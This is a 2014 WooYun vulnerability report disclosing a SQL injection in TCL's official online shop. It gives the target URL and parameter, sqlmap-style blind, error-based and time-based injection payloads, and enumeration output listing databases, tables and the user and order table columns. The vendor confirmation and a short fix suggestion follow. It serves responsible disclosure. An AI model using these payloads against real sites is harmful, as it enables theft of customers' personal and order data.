当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077768

漏洞标题:TCL官方商城存在sql注入,影响大量用户和订单数据

相关厂商:TCL官方网上商城

漏洞作者: xyang

提交时间:2014-09-29 16:35

修复时间:2014-11-13 16:36

公开时间:2014-11-13 16:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-29: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-13: 细节向公众公开

简要描述:

影响大量订单数据以及用户信息泄漏风险
用户量(约十万)订单数据(约3万)
未做任何破坏,可查证:)希望尽快修复!!

详细说明:

漏洞地址:

http://shop.tcl.com/mall/goods/index.html?cat_id=20&attrs_51=515


[J69[242GEPKJL(`@RBTLYM.jpg


直接报错了,那么接下来按部就班
注入参数:attrs_51
payload

---
Place: GET
Parameter: attrs_51
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: cat_id=20&attrs_51=515 RLIKE (SELECT (CASE WHEN (8708=8708) THEN 515 ELSE 0x28
END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cat_id=20&attrs_51=515 AND (SELECT 2138 FROM(SELECT COUNT(*),CONCAT
(0x716c676b71,(SELECT (CASE WHEN (2138=2138) THEN 1 ELSE 0 END)),0x7161706e71,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cat_id=20&attrs_51=515 AND SLEEP(5)
---


列数据库:

[01:06:22] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.0
[01:06:22] [INFO] fetching database names
[01:06:27] [INFO] the SQL query used returns 3 entries
[01:06:30] [INFO] retrieved: information_schema
[01:06:34] [INFO] retrieved: shoptcl
[01:06:37] [INFO] retrieved: test
available databases [3]:
[*] information_schema
[*] shoptcl
[*] test


跑表

Database: shoptcl
[152 tables]
+------------------------------+
| base_generate_number |
| c_goods_spec_index_0916 |
| ec_brand |
| ec_brand_category |
| ec_bulk_purchase |
| ec_cart |
| ec_category_spec |
| ec_category_spec_value |
| ec_comment |
| ec_comment_image |
| ec_consultation |
| ec_coupons |
| ec_coupons_goods |
| ec_coupons_use_detail |
| ec_custom_cat_menu |
| ec_evaluate |
| ec_evaluate_detail |
| ec_fenxiao_account |
| ec_fenxiao_copywritten |
| ec_fenxiao_fans_contact |
| ec_fenxiao_goods |
| ec_fenxiao_income_detail |
| ec_fenxiao_income_use_detail |
| ec_fenxiao_level |
| ec_fenxiao_order |
| ec_fenxiao_order_item |
| ec_fenxiao_product |
| ec_fenxiao_share |
| ec_fenxiao_share_stat |
| ec_fenxiao_shop_rela |
| ec_fenxiao_user |
| ec_fenxiao_user_audit |
| ec_fenxiao_user_cust |
| ec_fenxiao_withdraw |
| ec_freight_tpl |
| ec_freight_tpl_area |
| ec_freight_tpl_detail |
| ec_goods |
| ec_goods_collocation |
| ec_goods_custom_cat |
| ec_goods_gift |
| ec_goods_image |
| ec_goods_mapping |
| ec_goods_pkg |
| ec_goods_pkg_detail |
| ec_goods_pkg_image |
| ec_goods_relation |
| ec_goods_set |
| ec_goods_set_detail |
| ec_goods_spec_index |
| ec_group_purchase_item |
| ec_inventory_occupy_detail |
| ec_logistics_info |
| ec_logistics_tracking |
| ec_order |
| ec_order_discount |
| ec_order_item |
| ec_order_log |
| ec_order_msg_log |
| ec_order_refund |
| ec_order_refund_log |
| ec_payment |
| ec_payment_cfg |
| ec_product |
| ec_product_sku_rela |
| ec_product_sku_rela_0918 |
| ec_promotion |
| ec_promotion_discount |
| ec_promotion_integral |
| ec_promotion_present |
| ec_promotion_reduce |
| ec_promotion_seckill |
| ec_push_msg |
| ec_search_keword |
| ec_search_keyword |
| ec_search_log |
| ec_search_rela_keword |
| ec_search_weight_adjust |
| ec_search_weight_rule |
| ec_service_policy |
| ec_shop |
| ec_shop_category |
| ec_shop_sub_account |
| ec_spec |
| ec_spec_value |
| ec_store |
| ec_store_cover |
| ec_store_inventory |
| ec_store_sku |
| ec_transfer_account |
| ec_user_favorite |
| ec_user_history |
| esb_app_info |
| esb_app_permission |
| esb_msg_data |
| esb_msg_que |
| esb_service |
| esb_service_api |
| ro_resource |
| ro_role |
| ro_role_priv |
| ro_seller_log |
| ro_seller_menu |
| ro_subacct_role |
| ro_user |
| ro_user_address |
| sys_access_log |
| sys_admin |
| sys_admin_log |
| sys_admin_role |
| sys_admin_role_priv |
| sys_article |
| sys_caches |
| sys_category |
| sys_custom_category |
| sys_dict |
| sys_dict_type |
| sys_district |
| sys_email_verify_code |
| sys_feedback |
| sys_file |
| sys_file_server |
| sys_file_type |
| sys_image_thumbrule |
| sys_meta |
| sys_object_file |
| sys_point_rule |
| sys_position |
| sys_position_data |
| sys_position_keyword |
| sys_position_space |
| sys_poster |
| sys_poster_click |
| sys_poster_space |
| sys_reg_invite |
| sys_resource |
| sys_role |
| sys_session |
| sys_setting |
| sys_sms_sendlist |
| sys_sms_templates |
| sys_sms_verify_code |
| sys_template |
| sys_template_type |
| sys_user_point |
| sys_user_point_detail |
| sys_user_point_use_detail |
| sys_user_rank |
| sys_widget_callset |
| sys_widget_template |
| sys_widget_type |
| tmp_0916 |
+------------------------------+


既然是商城,那么来看看订单表结构:)

Database: shoptcl
Table: ec_order
[49 columns]
+----------------------+---------------+
| Column | Type |
+----------------------+---------------+
| adjust_fee | decimal(10,2) |
| buyer_message | varchar(255) |
| client_ip | varchar(50) |
| created_time | datetime |
| discount_fee | decimal(10,2) |
| end_time | datetime |
| evaluate_status | int(11) |
| invoice_name | varchar(255) |
| invoice_type | int(11) |
| modified_time | datetime |
| need_invoice | int(11) |
| order_discount_fee | decimal(10,2) |
| order_from | varchar(50) |
| order_id | int(11) |
| order_sn | varchar(64) |
| order_status | int(11) |
| pay_id | int(11) |
| pay_status | int(11) |
| pay_time | datetime |
| payment | decimal(10,2) |
| payment_code | varchar(50) |
| payment_type | int(11) |
| point_fee | decimal(10,2) |
| post_fee | decimal(10,2) |
| present_point | int(11) |
| print_number | int(11) |
| receiver_address | varchar(255) |
| receiver_city | varchar(50) |
| receiver_district | varchar(150) |
| receiver_district_id | int(11) |
| receiver_email | varchar(150) |
| receiver_mobile | varchar(50) |
| receiver_name | varchar(50) |
| receiver_phone | varchar(30) |
| receiver_state | varchar(50) |
| receiver_zip | varchar(20) |
| refund_status | int(11) |
| seller_email | varchar(50) |
| seller_memo | varchar(255) |
| seller_mobile | varchar(50) |
| seller_name | varchar(50) |
| seller_phone | varchar(50) |
| shipping_time | datetime |
| shop_id | int(11) |
| status | int(11) |
| total_fee | decimal(10,2) |
| trade_source | varchar(255) |
| use_point | int(11) |
| user_id | int(11) |
+----------------------+---------------+


然后就悲剧了,发现数据量还是挺大的,接近三万啊~~有图有真相

order订单.jpg


再看看用户表,吓了一跳,近十万的用户啊~~

Database: shoptcl
Table: ro_user
[24 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| birthday | datetime |
| description | varchar(400) |
| email | varchar(64) |
| email_status | tinyint(4) |
| encrypt | varchar(32) |
| gender | tinyint(4) |
| id | int(11) |
| last_ip | varchar(32) |
| last_login | datetime |
| last_time | datetime |
| login_num | int(11) |
| mobilephone | varchar(32) |
| modified_time | datetime |
| nickname | varchar(64) |
| password | varchar(32) |
| pid | varchar(20) |
| real_name | varchar(64) |
| reg_ip | varchar(32) |
| reg_time | datetime |
| status | tinyint(4) |
| telephone | varchar(32) |
| third_pintai | varchar(40) |
| third_uid | varchar(255) |
| user_name | varchar(64) |
+---------------+--------------+


user用户信息表.jpg


漏洞证明:

order订单.jpg

user用户信息表.jpg


修复方案:

:)参数过滤,,另外网站的报错可以隐藏
仅仅输出了部分测试数据,未破坏,未深入,然后就ctrl+c了
请贵站尽快安排修复:)

版权声明:转载请注明来源 xyang@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-29 16:42

厂商回复:

感谢您的工作,已转交相关单位确认处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-09-29 16:39 | Eoh ( 普通白帽子 | Rank:286 漏洞数:35 )

    已不想在提TCL的洞了,命令执行才10分。

  2. 2014-09-29 16:50 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)

    脑子瓦特了吧?别人不是给你20分么?哈哈